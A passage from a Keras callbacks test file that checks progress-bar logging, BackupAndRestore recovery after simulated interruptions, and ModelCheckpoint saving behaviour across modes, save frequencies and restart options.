keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = test_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')] +
additional_metrics,
run_eagerly=test_utils.should_run_eagerly())
return model
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes
def test_progbar_logging_with_stateful_metrics(self):
class AddAllOnes(keras.metrics.Metric):
"""A simple metric that adds all the one's in `y_true`."""
def __init__(self, name='add_all_ones', **kwargs):
super(AddAllOnes, self).__init__(name=name, **kwargs)
self.total = self.add_weight(name='total', initializer='zeros')
def update_state(self, y_true, y_pred, sample_weight=None):
self.total.assign_add(
tf.cast(tf.reduce_sum(y_true), dtype=tf.float32))
def result(self):
return self.total
x_train = np.array([[0, 1, 0, 1, 0, 1, 0, 1]] * 8).astype(float)
y_train = np.array([[1, 0], [0, 0], [1, 1], [1, 0], [0, 1], [1, 0], [1, 0],
[0, 0]])
# There are 7 ones in total in `y_train` after two batches.
expected_log = r'(.*- loss:.*- my_acc:.*- add_all_ones: 7.0000)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model = self._get_model(
input_shape=(8,), additional_metrics=[AddAllOnes()])
model.fit(x_train, y_train, verbose=1, batch_size=4, shuffle=False)
self.assertRegex(printed.contents(), expected_log)
# When not executing eagerly, `model.evaluate` does not have the metrics
# results printed.
if tf.executing_eagerly():
with self.captureWritesToStream(sys.stdout) as printed:
model = self._get_model(
input_shape=(8,), additional_metrics=[AddAllOnes()])
model.evaluate(x_train, y_train, verbose=1, batch_size=4)
self.assertRegex(printed.contents(), expected_log)
@test_combinations.run_all_keras_modes
def test_trivial_backup_restore(self):
if test_utils.should_run_eagerly():
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
cbk = BackupAndRestore(self.get_temp_dir())
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=0, callbacks=[cbk])
def test_backup_restore_train_counter(self):
if not tf.compat.v1.executing_eagerly():
self.skipTest('BackupAndRestore only available when execution is enabled')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
cbk = BackupAndRestore(self.get_temp_dir())
class InterruptingCallback(keras.callbacks.Callback):
"""A callback to intentionally introduce interruption to training."""
def on_epoch_end(self, epoch, log=None):
logging.info(f'counter: {model._train_counter}')
if epoch == 5 or epoch == 12:
raise RuntimeError('Interruption')
log_dir = self.get_temp_dir()
# The following asserts that the train counter is fault tolerant.
self.assertEqual(model._train_counter.numpy(), 0)
try:
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20,
callbacks=[cbk, InterruptingCallback()])
except RuntimeError:
pass
self.assertEqual(model._train_counter.numpy(), 6)
try:
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20,
callbacks=[cbk, InterruptingCallback()])
except RuntimeError:
pass
self.assertEqual(model._train_counter.numpy(), 13)
def _test_backup_and_restore_callback_with(self, cls):
if not tf.compat.v1.executing_eagerly():
self.skipTest('BackupAndRestore only available when execution is enabled')
class InterruptingCallback(keras.callbacks.Callback):
"""A callback to intentionally introduce interruption to training."""
def on_epoch_end(self, epoch, log=None):
if epoch == 15:
raise RuntimeError('Interruption')
model = keras.Sequential([keras.layers.Dense(10)])
optimizer = gradient_descent.SGD()
model.compile(optimizer, loss='mse')
x = tf.random.uniform((24, 10))
y = tf.random.uniform((24,))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).repeat().batch(2)
backup_callback = cls(backup_dir=self.get_temp_dir())
try:
model.fit(
dataset,
epochs=20,
steps_per_epoch=5,
callbacks=[backup_callback, InterruptingCallback()])
except RuntimeError:
logging.warning('***Handling interruption***')
# This continues at the epoch where it left off.
model.fit(
dataset, epochs=20, steps_per_epoch=5, callbacks=[backup_callback])
def test_experimental_backup_and_restore(self):
"""Ensure the legacy endpoint of `BackupAndRestore` gives warning."""
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
self._test_backup_and_restore_callback_with(BackupAndRestoreExperimental)
warning_msg = ('`tf.keras.callbacks.experimental.BackupAndRestore` '
'endpoint is deprecated')
self.assertIn(warning_msg, '\n'.join(warning_messages))
warning_msg = ('***Handling interruption***')
self.assertIn(warning_msg, '\n'.join(warning_messages))
def test_backup_and_restore(self):
"""Ensure the public endpoint of `BackupAndRestore` is working."""
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
self._test_backup_and_restore_callback_with(BackupAndRestore)
warning_msg = ('`tf.keras.callbacks.experimental.BackupAndRestore` '
'endpoint is deprecated')
self.assertNotIn(warning_msg, '\n'.join(warning_messages))
warning_msg = ('***Handling interruption***')
self.assertIn(warning_msg, '\n'.join(warning_messages))
@test_combinations.run_all_keras_modes
def test_callback_warning(self):
class SleepCallback(keras.callbacks.Callback):
def on_train_batch_end(self, batch, logs=None):
time.sleep(0.1)
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=test_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1,
callbacks=[SleepCallback()])
warning_msg = ('Callback method `on_train_batch_end` is slow compared '
'to the batch time')
self.assertIn(warning_msg, '\n'.join(warning_messages))
@test_combinations.run_all_keras_modes
def test_default_callbacks_no_warning(self):
# Test that without the callback no warning is raised
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=test_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1)
self.assertListEqual(warning_messages, [])
@test_combinations.run_with_all_model_types(exclude_models='functional')
@test_combinations.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes
def test_progbar_logging_validation_data(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((50, 3))
y = tf.zeros((50, 2))
training_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
val_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(training_dataset, epochs=2, validation_data=val_dataset)
self.assertRegex(printed.contents(), expected_log)
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_validation_split(self):
model = self._get_model(input_shape=(3,))
x = np.ones((100, 3))
y = np.zeros((100, 2))
expected_log = (
r'(?s).*1/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
self.assertRegex(printed.contents(), expected_log)
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_training_validation(self):
model = self._get_model(input_shape=(2,))
def generator():
for _ in range(100):
yield [1, 1], 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2) \
.repeat()
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
expected_log = (
r'(?s).*1/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x=training, validation_data=validation, epochs=2, steps_per_epoch=20)
self.assertRegex(printed.contents(), expected_log)
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_with_dataset_and_partial_batch(self):
model = self._get_model(input_shape=(2,))
def generator():
# Have a partial batch at the end.
for _ in range(9):
yield np.random.random(2), 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x=training, validation_data=validation)
# Make sure the value of val_ metrics are not zeros.
log_content = printed.contents()
val_loss = re.findall(r'val_loss: (\d\.\d+)', log_content)
self.assertLen(val_loss, 1)
self.assertGreater(float(val_loss[0]), 0.0)
@test_combinations.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
model_type = test_utils.get_model_type()
if model_type == 'subclass':
return # Skip test since subclassed models cannot be saved in .h5 format.
if not tf.__internal__.tf2.enabled():
self.skipTest('Checkpoint callback only available in v2.')
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = test_utils.get_model_from_layers(layers, input_shape=(3,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# Case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 5: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# Case 6
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 7: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 8: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=15,
period=100) # The period should be ignored (this test tests this).
]
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 9: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegex(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
# Case 10: `ModelCheckpoint` with valid and invalid `options` argument.
with self.assertRaisesRegex(TypeError, 'tf.train.CheckpointOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.saved_model.SaveOptions())
with self.assertRaisesRegex(TypeError, 'tf.saved_model.SaveOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.saved_model.SaveOptions())
# Case 11: `ModelCheckpoint` save model with batch number in filename.
filepath = os.path.join(temp_dir,
'checkpoint.epoch{epoch:02d}batch{batch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(filepath, monitor=monitor, save_freq=1)
]
assert not os.path.exists(filepath.format(epoch=1, batch=1))
assert not os.path.exists(filepath.format(epoch=1, batch=2))
assert not os.path.exists(filepath.format(epoch=2, batch=1))
assert not os.path.exists(filepath.format(epoch=2, batch=2))
assert not os.path.exists(filepath.format(epoch=3, batch=1))
assert not os.path.exists(filepath.format(epoch=3, batch=2))
assert not os.path.exists(filepath.format(epoch=4, batch=1))
assert not os.path.exists(filepath.format(epoch=4, batch=2))
assert not os.path.exists(filepath.format(epoch=5, batch=1))
assert not os.path.exists(filepath.format(epoch=5, batch=2))
model.fit(
x_train,
y_train,
batch_size=5,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=1)
assert os.path.exists(filepath.format(epoch=1, batch=1))
assert os.path.exists(filepath.format(epoch=1, batch=2))
assert os.path.exists(filepath.format(epoch=2, batch=1))
assert os.path.exists(filepath.format(epoch=2, batch=2))
assert os.path.exists(filepath.format(epoch=3, batch=1))
assert os.path.exists(filepath.format(epoch=3, batch=2))
assert os.path.exists(filepath.format(epoch=4, batch=1))
assert os.path.exists(filepath.format(epoch=4, batch=2))
assert os.path.exists(filepath.format(epoch=5, batch=1))
assert os.path.exists(filepath.format(epoch=5, batch=2))
os.remove(filepath.format(epoch=1, batch=1))
os.remove(filepath.format(epoch=1, batch=2))
os.remove(filepath.format(epoch=2, batch=1))
os.remove(filepath.format(epoch=2, batch=2))
os.remove(filepath.format(epoch=3, batch=1))
os.remove(filepath.format(epoch=3, batch=2))
os.remove(filepath.format(epoch=4, batch=1))
os.remove(filepath.format(epoch=4, batch=2))
os.remove(filepath.format(epoch=5, batch=1))
os.remove(filepath.format(epoch=5, batch=2))
# Case 12: ModelCheckpoint saves model with initial_value_threshold param
mode = 'max'
monitor = 'val_acc'
initial_value_threshold = 0
save_best_only = True
filepath = os.path.join(temp_dir, 'checkpoint.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 13: ModelCheckpoint saves model with initial_value_threshold param
mode = 'auto'
monitor = 'val_loss'
initial_value_threshold = None
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 14: ModelCheckpoint doesnt save model if loss was minimum earlier
mode = 'min'
monitor = 'val_loss'
initial_value_threshold = 0
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert not os.path.exists(filepath)
# Case 15: ModelCheckpoint doesnt save model if loss was min earlier in auto
# mode
mode = 'auto'
monitor = 'val_loss'
initial_value_threshold = 0
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert not os.path.exists(filepath)
@test_utils.run_v2_only
def test_ModelCheckpoint_subclass_save_weights_false(self):
model = test_utils.get_small_subclass_mlp(NUM_HIDDEN, NUM_CLASSES)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint')
cbks = [keras.callbacks.ModelCheckpoint(
filepath, save_weights_only=False)]
(x_train, y_train), _ = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_train = np_utils.to_categorical(y_train, num_classes=NUM_CLASSES)
model.fit(
x_train,
y_train,
callbacks=cbks,
epochs=1,
verbose=0)
# Check that the filepath is a SavedModel directory.
self.assertIn('saved_model.pb', os.listdir(filepath))
def _get_dummy_resource_for_model_checkpoint_testing(self):
def get_input_datasets():
# Simple training input.
train_input = [[1.]] * 16
train_label = [[0.]] * 16
ds = tf.data.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(test_utils.Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
return model, train_ds, callback, filepath
def _run_load_weights_on_restart_test_common_iterations(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
initial_epochs = 3
model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])
# The files should exist after fitting with callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=initial_epochs))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period ensuring the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
model.fit(train_ds, epochs=1, callbacks=[callback])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=1))
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_with_one_final_extra_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are closed, if a ModelCheckpoint with
# load_weights_on_restart=True is given (so the model is restored at the
# beginning of training).
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
self.assertNotAllClose(weights_after_one_more_epoch,
weights_with_one_final_extra_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period to ensure the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_before_additional_fit = model.get_weights()
model.fit(train_ds, epochs=1, callbacks=[callback])
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_fit_with_ModelCheckpoint_with_tf_config(self):
(model, train_ds, callback,
_) = self._get_dummy_resource_for_model_checkpoint_testing()
os.environ['TF_CONFIG'] = json.dumps({
'cluster': {
'worker': ['localhost:23333']
},
'task': {
'type': 'worker',
'index': 0
}
})
# `model.fit()` should work regardless of the presence of `TF_CONFIG`.
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_fit_with_ModelCheckpoint_with_dir_as_h5_filepath(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'temp.h5')
self.assertFalse(os.path.exists(filepath))
os.mkdir(filepath)
self.assertTrue(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(
IOError, 'Please specify a non-directory '
'filepath for ModelCheckpoint.'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_with_bad_path_placeholders(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'chkpt_{epoch:02d}_{mape:.2f}.h5')
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(KeyError, 'Failed to format this callback '
'filepath.*'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_nonblocking(self):
filepath = self.get_temp_dir()
# Should only cause a sync block when saving is actually performed.
callback = keras.callbacks.ModelCheckpoint(filepath=filepath, save_freq=100)
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ModelCheckpoint is causing a blocking '
'NumPy conversion even when not checkpointing.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
def test_verbose_2_logging(self):
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
expected_log = r'(.*- loss:.*- acc.*:.*epoch)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(data, labels, verbose=2, epochs=20)
self.assertRegex(printed.contents(), expected_log)
def test_ProgbarLogger_verbose_2_nonblocking(self):
# Should only cause a sync block on epoch end methods.
callback = keras.callbacks.ProgbarLogger(count_mode='steps')
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=2)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ModelCheckpoint is causing a blocking '
'NumPy conversion even when not checkpointing.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
